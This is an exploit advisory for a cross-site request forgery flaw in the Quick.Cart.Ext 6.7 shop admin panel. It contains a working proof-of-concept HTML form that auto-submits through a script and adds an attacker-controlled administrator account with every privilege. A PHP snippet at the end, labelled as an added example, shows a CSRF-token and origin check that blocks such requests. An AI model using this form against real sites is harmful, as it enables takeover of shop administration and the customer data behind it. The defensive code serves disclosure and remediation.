Quick.Cart.Ext 6.7 Cross Site Request Forgery

<!--
# Exploit Title: Quick.Cart.Ext <= v6.7 Remote Admin Add CSRF Exploit
# Exploit Author: s0nk3y
# Contact : s0nk3y at gmail com
# Google Dork: -
# Date: 22/06/2016
# Vendor Homepage: https://opensolution.org
# Software Link: http://opensolution.org/download/home.html?sFile=Quick.Cart_v6.7.zip
# Version: 6.7
# Tested on: Ubuntu 16.04

Quick.Cart.Ext is vulnerable to CSRF because no CSRF token is in place. If an
admin user can be tricked into visiting a crafted URL created by an attacker
(via spear phishing/social engineering), a form will be submitted to
(http://server/Quick.Cart.Ext/admin.php?p=admins-form) that adds a new user
as administrator.
Once exploited, the attacker can log in to the admin panel (
http://localhost/Quick.Cart.Ext/admin.php)
using the username and the password posted in the form.

CSRF PoC Code
=============
-->

<form method="post" action="http://server/Quick.Cart.Ext/admin.php?p=admins-form">
<input type="hidden" name="sLogin" value="attacker"/>
<input type="hidden" name="sPass" value="attacker"/>
<input type="hidden" name="sName" value="attacker"/>
<input type="hidden" name="sEmail" value="attacker@email.com"/>
<input type="hidden" name="iAdmin" value="2"/>
<input type="hidden" name="sOption" value="save »"/>
<input type="hidden" name="aPrivilagesForm[products-list]" value="1"/>
<input type="hidden" name="aPrivilagesForm[products-form]" value="1"/>
<input type="hidden" name="aPrivilagesForm[products-delete]" value="1"/>
<input type="hidden" name="aPrivilagesForm[products-export]" value="1"/>
<input type="hidden" name="aPrivilagesForm[products-import]" value="1"/>
<input type="hidden" name="aPrivilagesForm[orders-list]" value="1"/>
<input type="hidden" name="aPrivilagesForm[orders-form]" value="1"/>
<input type="hidden" name="aPrivilagesForm[orders-delete]" value="1"/>
<input type="hidden" name="aPrivilagesForm[pages-list]" value="1"/>
<input type="hidden" name="aPrivilagesForm[pages-form]" value="1"/>
<input type="hidden" name="aPrivilagesForm[pages-delete]" value="1"/>
<input type="hidden" name="aPrivilagesForm[shipping]" value="1"/>
<input type="hidden" name="aPrivilagesForm[payments]" value="1"/>
<input type="hidden" name="aPrivilagesForm[tools-config]" value="1"/>
<input type="hidden" name="aPrivilagesForm[admins]" value="1"/>
<input type="hidden" name="aPrivilagesForm[lang]" value="1"/>
<input type="hidden" name="aPrivilagesForm[backup-list]" value="1"/>
<input type="hidden" name="aPrivilagesForm[backup-create]" value="1"/>
<input type="hidden" name="aPrivilagesForm[fixes]" value="1"/>
<input type="hidden" name="aPrivilagesForm[plugins]" value="1"/>
<input type="hidden" name="aPrivilagesForm[boxes]" value="1"/>
<input type="hidden" name="aPrivilagesForm[vouchers]" value="1"/>
<input type="hidden" name="aPrivilagesForm[features]" value="1"/>
<input type="hidden" name="aPrivilagesForm[products-comments-list]" value="1"/>
<input type="hidden" name="aPrivilagesForm[pages-comments-list]" value="1"/>
<input type="hidden" name="aPrivilagesForm[comments-delete]" value="1"/>
<input type="hidden" name="aPrivilagesForm[users]" value="1"/>
<input type="hidden" name="iStatus" value="1"/>
</form>
<script>
document.forms[0].submit();
</script>
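
The advisory attributes the issue to the absence of a CSRF token on admin.php. As an added example (not Quick.Cart.Ext's code and not the exploit author's), this is one way a PHP 7 admin entry point could bind POST requests to a per-session token and check the request's origin. The field name `sCsrfToken`, the function names and the include location are assumptions.

```php
<?php
// Added example, not Quick.Cart.Ext code. Assumed to be included at the top
// of admin.php; CSRF_FIELD and all function names are hypothetical.
const CSRF_FIELD = 'sCsrfToken';

// Per-session random token, created on first use.
function csrfToken(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden input to print inside every admin <form>, including admins-form.
function csrfField(): string {
    return '<input type="hidden" name="' . CSRF_FIELD . '" value="' . csrfToken() . '"/>';
}

// Origin (or Referer) must name this host; "Origin: null" fails the check.
function sameOrigin(array $server): bool {
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    if ($source === '') {
        return true; // neither header sent: the token check alone decides
    }
    $sourceHost = parse_url($source, PHP_URL_HOST);
    $ownHost = parse_url('//' . ($server['HTTP_HOST'] ?? ''), PHP_URL_HOST);
    return is_string($sourceHost) && is_string($ownHost)
        && strcasecmp($sourceHost, $ownHost) === 0;
}

// Reject any POST whose token does not match the one stored in the session.
// Assumption: state-changing admin actions arrive as POST, as in the PoC.
function csrfGuard() {
    if (($_SERVER['REQUEST_METHOD'] ?? 'GET') !== 'POST') {
        return;
    }
    $sent = $_POST[CSRF_FIELD] ?? '';
    $known = $_SESSION['csrf_token'] ?? '';
    if (!is_string($sent) || $known === '' || !hash_equals($known, $sent) || !sameOrigin($_SERVER)) {
        http_response_code(403);
        exit('Request rejected: missing or invalid CSRF token.');
    }
}

if (session_status() !== PHP_SESSION_ACTIVE) {
    session_start();
}
csrfGuard();
```

A cross-site form like the one above cannot read the session's token, so its POST carries no `sCsrfToken` value and is answered with 403 before any admin handler runs.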